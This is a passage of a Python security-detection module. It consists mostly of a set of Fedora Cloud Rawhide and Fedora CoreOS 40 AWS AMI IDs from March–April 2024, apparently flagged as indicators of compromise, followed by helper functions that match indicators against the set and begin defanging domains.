    "ami-05f8c75683ae14a00",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-06cc320fb70dc3658",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0e5f7945e2c0a5b27",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ap-south-1-gp3-0 ap-south-1
    "ami-0aab2290ead070285",  # fedora-coreos-40.20240331.1.0-aarch64 ap-south-1
    "ami-02ebbd07b85df07f3",  # fedora-coreos-40.20240329.10.0-x86_64 ap-south-1
    "ami-02ee14719e7c21275",  # fedora-coreos-40.20240329.10.0-aarch64 ap-south-1
    "ami-0eb8390d2255b2c7f",  # fedora-coreos-40.20240331.1.0-x86_64 ap-south-1
    "ami-02d7c61a4040c555f",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-05645c6a461e033c9",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-02186a7f6169122dc",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0c1585cbf5e73cc1e",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0429a7233e80586d2",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-01401ea8a15bf2503",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0fc2f877e0ef88ac5",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-014b02231fae70d7a",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0961f0908e7cbb5a0",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0bf5c819317a704d5",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0b5dcf0d23dd1cb78",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-071cd9ae3dd16663c",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ap-southeast-1-gp3-0 ap-southeast-1
    "ami-0dbe71c2ce11d698c",  # fedora-coreos-40.20240329.10.0-aarch64 ap-southeast-1
    "ami-0b47f8ae2dc6d24f3",  # fedora-coreos-40.20240331.1.0-x86_64 ap-southeast-1
    "ami-02d20db09bf8e28c8",  # fedora-coreos-40.20240331.1.0-aarch64 ap-southeast-1
    "ami-03088bd1505f6ae5e",  # fedora-coreos-40.20240329.10.0-x86_64 ap-southeast-1
    "ami-035b1dafce72ac02e",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-075d106c120fb481e",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-0cb951277fde9f7d5",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-0f6b2a2847db753bf",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-0a9540e380446f382",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-08ca87171dbc818d7",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-0bfd0266b107b6955",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-03823c12b0e09a536",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-073e9f0b78425bdd6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-05c6820aed5b665a1",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-06aa465859abfe347",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-0fe7d9707e702a13e",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ap-southeast-2-gp3-0 ap-southeast-2
    "ami-075cd46c0bc62d008",  # fedora-coreos-40.20240329.10.0-aarch64 ap-southeast-2
    "ami-0311d8c14d2a7035b",  # fedora-coreos-40.20240331.1.0-aarch64 ap-southeast-2
    "ami-09c0a5a1241b4fcce",  # fedora-coreos-40.20240329.10.0-x86_64 ap-southeast-2
    "ami-096b56b4de809cffe",  # fedora-coreos-40.20240331.1.0-x86_64 ap-southeast-2
    "ami-0db952d81e66ada95",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-01b1ee3368a31c994",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-06a2bcb91739e41f7",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0bbffb266d024e316",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0f73621d46081da00",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-095a6d44db6018054",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0dec58aca231a82e6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0ae607528e2f9391d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0a14647322af86be9",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0b41e3fde6356b76d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-0fe2626321b62790f",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-03f26b5a76090780d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-ca-central-1-gp3-0 ca-central-1
    "ami-04edae0331a2cb99a",  # fedora-coreos-40.20240331.1.0-x86_64 ca-central-1
    "ami-05d40c4aba79d696a",  # fedora-coreos-40.20240331.1.0-aarch64 ca-central-1
    "ami-018818658060cd185",  # fedora-coreos-40.20240329.10.0-aarch64 ca-central-1
    "ami-0a54e56d84fc1fde2",  # fedora-coreos-40.20240329.10.0-x86_64 ca-central-1
    "ami-0b0c6db4cee6ebbcb",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0011fd6bde84052e0",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0c633084aabd8fe9d",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-042e6b5eef13326c5",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0a6c3074e9ef5eb22",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-04bd19e31bbecfcd0",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0ac4df0e77d4dcd08",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0d7f3ea5e69f37cf6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-071fb6330ec75ed99",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-07cfa39d313b5bb1d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0f2d495891c81cda4",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-0b22caf7ce0715f3b",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-eu-central-1-gp3-0 eu-central-1
    "ami-03a0102e43619d36b",  # fedora-coreos-40.20240331.1.0-aarch64 eu-central-1
    "ami-06a49229bdd5273d9",  # fedora-coreos-40.20240331.1.0-x86_64 eu-central-1
    "ami-076d5c937d8f98c03",  # fedora-coreos-40.20240329.10.0-x86_64 eu-central-1
    "ami-0e194fcd036523ca4",  # fedora-coreos-40.20240329.10.0-aarch64 eu-central-1
    "ami-0679e33db04e369fc",  # fedora-coreos-40.20240331.1.0-x86_64 eu-north-1
    "ami-0d91dff508cea2dd3",  # fedora-coreos-40.20240329.10.0-aarch64 eu-north-1
    "ami-0d470a67462b1b4d6",  # fedora-coreos-40.20240329.10.0-x86_64 eu-north-1
    "ami-09e4f9084e0950377",  # fedora-coreos-40.20240331.1.0-aarch64 eu-north-1
    "ami-066d751b0a5cb9757",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-08d155e7d87534921",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-080ad449e81c53a5d",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0c7c0ab709d094e65",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0a5e7b1fd76745847",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0ae45404264806116",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-028dc6f7c33ee0b4d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-08e011719a44ec4d6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-05656a908af9df8a6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0c57ab4f2937cf855",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0add1262f7a3bb815",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0a1f87dd2bc94bbfc",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-eu-west-1-gp3-0 eu-west-1
    "ami-0107d7e090bded724",  # fedora-coreos-40.20240329.10.0-aarch64 eu-west-1
    "ami-037402d3e5225050f",  # fedora-coreos-40.20240331.1.0-x86_64 eu-west-1
    "ami-02cd531f57b79a7aa",  # fedora-coreos-40.20240331.1.0-aarch64 eu-west-1
    "ami-0d128112cb2749e7a",  # fedora-coreos-40.20240329.10.0-x86_64 eu-west-1
    "ami-04f3a958a99290dbe",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0b64bc38f7b8cd696",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-056f52f9d0798067d",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0fd8a21ebe9ece144",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-019718d1b66fea681",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0d6a98836104061a6",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0836d1ee2596846e8",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0ea6a963b5b01b89f",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-068fb00a122c8a3ae",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0392afabc5da9aa27",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-03fbe24ada996c761",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-0d157bb01a2c80b71",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-eu-west-2-gp3-0 eu-west-2
    "ami-031a77879f974be22",  # fedora-coreos-40.20240329.10.0-aarch64 eu-west-2
    "ami-0eab39cbbd3b450b0",  # fedora-coreos-40.20240331.1.0-aarch64 eu-west-2
    "ami-0de5e6511774e513c",  # fedora-coreos-40.20240331.1.0-x86_64 eu-west-2
    "ami-014a2387605b6ed3d",  # fedora-coreos-40.20240329.10.0-x86_64 eu-west-2
    "ami-099145a1f43770cd0",  # fedora-coreos-40.20240331.1.0-x86_64 eu-west-3
    "ami-01c5e7f50df21f6c7",  # fedora-coreos-40.20240329.10.0-x86_64 eu-west-3
    "ami-03a156814633590b1",  # fedora-coreos-40.20240329.10.0-aarch64 eu-west-3
    "ami-0ecfc4d55df8e9cc8",  # fedora-coreos-40.20240331.1.0-aarch64 eu-west-3
    "ami-0026b58ba1ae7e8fc",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-048e80bf078f16fb9",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-05f7ef4f69d6a19c6",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-07ba6b69b4e8edecf",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-0f830b84842789ca4",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-0b02dbcea77692098",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-0f004fcf16b59f696",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-071cb491ffbb72a4c",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-005e533a8828c40a7",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-00d903771c231f51b",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-007347abb797443e9",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-0c51bef7879a63e99",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-sa-east-1-gp3-0 sa-east-1
    "ami-02e51dd313c554c1d",  # fedora-coreos-40.20240329.10.0-aarch64 sa-east-1
    "ami-0e37c7770d63c3020",  # fedora-coreos-40.20240329.10.0-x86_64 sa-east-1
    "ami-0f527f9fbe07448f5",  # fedora-coreos-40.20240331.1.0-aarch64 sa-east-1
    "ami-0a0a0f1c36cf8c3d7",  # fedora-coreos-40.20240331.1.0-x86_64 sa-east-1
    "ami-0b890d61c6bfc7fd0",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-099c0415ae1c8704f",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-01d93f2ed9036c444",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-03f31087fc159f228",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-05693d19b77ccc629",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-us-east-1-gp3-0 us-east-1
    "ami-0f4eefe7bf5636f18",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-0c3899a500d3f81d9",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-078715005abc0bea3",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-059e900e520a0febe",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-0e399bd567fbd4050",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-us-east-1-gp3-0 us-east-1
    "ami-01d556a8aed949865",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-028ae719081ff9141",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-us-east-1-gp3-0 us-east-1
    "ami-0fc4ac1cc421c274f",  # fedora-coreos-40.20240328.10.1-aarch64 us-east-1
    "ami-0e8c9542806a49fdc",  # fedora-coreos-40.20240326.10.0-aarch64 us-east-1
    "ami-03cebfaac4a4b6156",  # fedora-coreos-40.20240328.10.0-x86_64 us-east-1
    "ami-08f1ca38230424149",  # fedora-coreos-40.20240331.10.0-x86_64 us-east-1
    "ami-08e57ea8f8ecbb96b",  # fedora-coreos-40.20240330.10.0-aarch64 us-east-1
    "ami-0420fa82d1a55a04d",  # fedora-coreos-40.20240331.10.0-aarch64 us-east-1
    "ami-0d8cd73663a3180e4",  # fedora-coreos-40.20240328.10.0-aarch64 us-east-1
    "ami-0e172c40c3ab0283b",  # fedora-coreos-40.20240328.10.3-x86_64 us-east-1
    "ami-02a5da3b3c653541c",  # fedora-coreos-40.20240328.10.1-x86_64 us-east-1
    "ami-0d6b046b67f2ec40c",  # fedora-coreos-40.20240331.1.0-x86_64 us-east-1
    "ami-0ded444bcb8def0a0",  # fedora-coreos-40.20240326.10.1-x86_64 us-east-1
    "ami-0226592a906bae601",  # fedora-coreos-40.20240326.10.1-aarch64 us-east-1
    "ami-087e9a07cbe450b1f",  # fedora-coreos-40.20240331.10.1-x86_64 us-east-1
    "ami-00f5623d1d8d863aa",  # fedora-coreos-40.20240331.1.0-aarch64 us-east-1
    "ami-0b041ca5b98d2314a",  # fedora-coreos-40.20240329.10.0-aarch64 us-east-1
    "ami-011ccf5cf6aca3e39",  # fedora-coreos-40.20240328.10.3-aarch64 us-east-1
    "ami-098ca38fb3622c1d2",  # fedora-coreos-40.20240326.10.0-x86_64 us-east-1
    "ami-0ac1330dadf281b2f",  # fedora-coreos-40.20240328.10.2-x86_64 us-east-1
    "ami-062c38d59d67dcd81",  # fedora-coreos-40.20240330.10.0-x86_64 us-east-1
    "ami-09322b0a6edb8b311",  # fedora-coreos-40.20240329.10.0-x86_64 us-east-1
    "ami-0d561945ea877a79d",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-098324e931c6b5447",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-0f2b057ecde88941c",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-04096bec7d888ed10",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-0dec4ce2229937c36",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-us-east-2-gp3-0 us-east-2
    "ami-0c69ad03c8495ad63",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-03faf8bbf92792d9b",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-0e409c60b98ea8358",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-0d98bb4012dd4d082",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-073de5a3532e0cafb",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-us-east-2-gp3-0 us-east-2
    "ami-01da3df628ddfeb94",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-05f2d9411b6cf8ba3",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-us-east-2-gp3-0 us-east-2
    "ami-009ea87b9afa8b27e",  # fedora-coreos-40.20240329.10.0-aarch64 us-east-2
    "ami-0b19c3ec448c2db5d",  # fedora-coreos-40.20240329.10.0-x86_64 us-east-2
    "ami-0da567111c7144af3",  # fedora-coreos-40.20240331.1.0-x86_64 us-east-2
    "ami-0270bd5d45ef1ce2f",  # fedora-coreos-40.20240331.1.0-aarch64 us-east-2
    "ami-0c2074bb1d42d5c47",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-02870e3c3ac06f22a",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-011d5d2e4edd5f115",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-us-west-1-gp3-0 us-west-1
    "ami-04faeff5f8a080464",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-01b2d9b3409a192f4",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-0eea7d6b69d96ffd0",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-05dc988900937cdb6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-0d2ad965cc77d1efc",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-us-west-1-gp3-0 us-west-1
    "ami-0bb8b68a73943c9fb",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-0051b0d7b66151c83",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-0b854f86a33caa37d",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-034644ca75beb9ba2",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-us-west-1-gp3-0 us-west-1
    "ami-0925bf6e49075aa8c",  # fedora-coreos-40.20240331.1.0-aarch64 us-west-1
    "ami-0ddda0b5b83d56208",  # fedora-coreos-40.20240329.10.0-aarch64 us-west-1
    "ami-03790d65f69cf2e00",  # fedora-coreos-40.20240331.1.0-x86_64 us-west-1
    "ami-049e91e7496138039",  # fedora-coreos-40.20240329.10.0-x86_64 us-west-1
    "ami-03ba5852acf89c4be",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.1-hvm-us-west-2-gp3-0 us-west-2
    "ami-08c6b132407b025b7",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240401.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-036645f0339f5a889",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240331.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-020a359780bc6f835",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240330.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-092e3b17e435e5e58",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240328.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-03cad1daf37200a2d",  # Fedora-Cloud-Base-AmazonEC2.x86_64-Rawhide-20240329.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-0500458bbdc480fd9",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.1-hvm-us-west-2-gp3-0 us-west-2
    "ami-0ad79a6b913a454e5",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240330.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-09f2d28702f57b85c",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240328.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-08200843b835932e6",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240331.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-07032d2bce4208ea2",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240401.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-0af17f237fcd582cd",  # Fedora-Cloud-Base-AmazonEC2.aarch64-Rawhide-20240329.n.0-hvm-us-west-2-gp3-0 us-west-2
    "ami-0c674423dd90e483c",  # fedora-coreos-40.20240329.10.0-x86_64 us-west-2
    "ami-0e4711bf3d106e149",  # fedora-coreos-40.20240331.1.0-aarch64 us-west-2
    "ami-09b81f0f9f2acfcdf",  # fedora-coreos-40.20240331.1.0-x86_64 us-west-2
    "ami-083bb1ae22e9bf463",  # fedora-coreos-40.20240329.10.0-aarch64 us-west-2
}


# IOC Helper functions:
def ioc_match(indicators: list, known_iocs: set) -> list:
    """
    Matches a set of indicators against known Indicators of Compromise

    :param indicators: List of potential indicators of compromise
    :param known_iocs: Set of known indicators of compromise
    :return: List of any indicator matches
    """
    # Check through the IP IOCs
    return [ioc for ioc in (indicators or []) if ioc in known_iocs]


def sanitize_domain(domain: str) -> str:
    """
    Makes a potential malicious domain not render as a domain in most systems

    :param domain: Original domain
